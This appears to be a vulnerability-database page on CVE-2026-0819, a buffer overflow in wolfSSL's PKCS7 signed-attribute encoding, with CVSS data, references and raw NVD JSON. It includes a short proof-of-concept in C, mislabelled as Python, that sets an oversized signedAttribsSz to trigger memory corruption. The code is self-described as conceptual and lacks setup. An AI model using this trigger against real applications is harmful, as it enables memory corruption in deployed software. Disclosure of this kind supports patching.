CVE-2026-0819

Description

A stack buffer overflow vulnerability exists in wolfSSL's PKCS7 SignedData encoding functionality. In wc_PKCS7_BuildSignedAttributes(), when adding custom signed attributes, the code passes an incorrect capacity value (esd->signedAttribsCount) to EncodeAttributes() instead of the remaining available space in the fixed-size signedAttribs[7] array. When an application sets pkcs7->signedAttribsSz to a value greater than MAX_SIGNED_ATTRIBS_SZ (default 7) minus the number of default attributes already added, EncodeAttributes() writes beyond the array bounds, causing stack memory corruption. In WOLFSSL_SMALL_STACK builds, this becomes heap corruption. Exploitation requires an application that allows untrusted input to control the signedAttribs array size when calling wc_PKCS7_EncodeSignedData() or related signing functions.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:* - VULNERABLE

wolfSSL (具体受影响版本请参考官方安全公告及PR #9630)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-0819
 * Conceptual demonstration of triggering the buffer overflow.
 * This requires a wolfSSL environment and proper context setup.
 */

#include <wolfssl/options.h>
#include <wolfssl/wolfcrypt/pkcs7.h>
#include <wolfssl/wolfcrypt/asn.h>
#include <stdio.h>

int main() {
    int ret;
    byte der[1024];
    int derSz = sizeof(der);

    // Initialize PKCS7 structure (Context setup required in real env)
    PKCS7* pkcs7 = wc_PKCS7_New(NULL, INVALID_DEVID);
    if (!pkcs7) {
        printf("Failed to init PKCS7\n");
        return -1;
    }

    // Vulnerability Trigger:
    // MAX_SIGNED_ATTRIBS_SZ is 7. Setting a size larger than available space
    // causes EncodeAttributes to write beyond signedAttribs[7] boundaries.
    // In a real scenario, this value comes from untrusted input.
    pkcs7->signedAttribsSz = 100; 

    // The encoding process calls wc_PKCS7_BuildSignedAttributes internally.
    // This triggers the stack/heap corruption.
    ret = wc_PKCS7_EncodeSignedData(pkcs7, der, &derSz);

    if (ret < 0) {
        printf("Encode failed/crashed as expected: %d\n", ret);
    } else {
        printf("Encoding succeeded (unexpected)\n");
    }

    wc_PKCS7_Free(pkcs7);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0819
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0819
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0819/
[4] VulDB https://vuldb.com/cve/CVE-2026-0819
[5] https://github.com/wolfSSL/wolfssl/pull/9630

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0819", "sourceIdentifier": "[email protected]", "published": "2026-03-19T17:16:21.657", "lastModified": "2026-04-29T18:50:05.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack buffer overflow vulnerability exists in wolfSSL's PKCS7 SignedData encoding functionality. In wc_PKCS7_BuildSignedAttributes(), when adding custom signed attributes, the code passes an incorrect capacity value (esd->signedAttribsCount) to EncodeAttributes() instead of the remaining available space in the fixed-size signedAttribs[7] array. When an application sets pkcs7->signedAttribsSz to a value greater than MAX_SIGNED_ATTRIBS_SZ (default 7) minus the number of default attributes already added, EncodeAttributes() writes beyond the array bounds, causing stack memory corruption. In WOLFSSL_SMALL_STACK builds, this becomes heap corruption. Exploitation requires an application that allows untrusted input to control the signedAttribs array size when calling wc_PKCS7_EncodeSignedData() or related signing functions."}, {"lang": "es", "value": "Una vulnerabilidad de desbordamiento de búfer de pila existe en la funcionalidad de codificación de datos firmados (SignedData) PKCS7 de wolfSSL. En wc_PKCS7_BuildSignedAttributes(), al añadir atributos firmados personalizados, el código pasa un valor de capacidad incorrecto (esd->signedAttribsCount) a EncodeAttributes() en lugar del espacio disponible restante en el array de tamaño fijo signedAttribs[7]. Cuando una aplicación establece pkcs7->signedAttribsSz a un valor mayor que MAX_SIGNED_ATTRIBS_SZ (por defecto 7) menos el número de atributos por defecto ya añadidos, EncodeAttributes() escribe más allá de los límites del array, causando corrupción de memoria de pila. En compilaciones WOLFSSL_SMALL_STACK, esto se convierte en corrupción de heap. La explotación requiere una aplicación que permita que la entrada no confiable controle el tamaño del array signedAttribs al llamar a wc_PKCS7_EncodeSignedData() o funciones de firma relacionadas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.2, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}, {"lang": "en", "value": "CWE-787"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5.0", "versionEndExcluding": "5.9.0", "matchCriteriaId": "CC77D5AA-8CFE-43F8-8FD9-E003646125E0"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssl/pull/9630", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}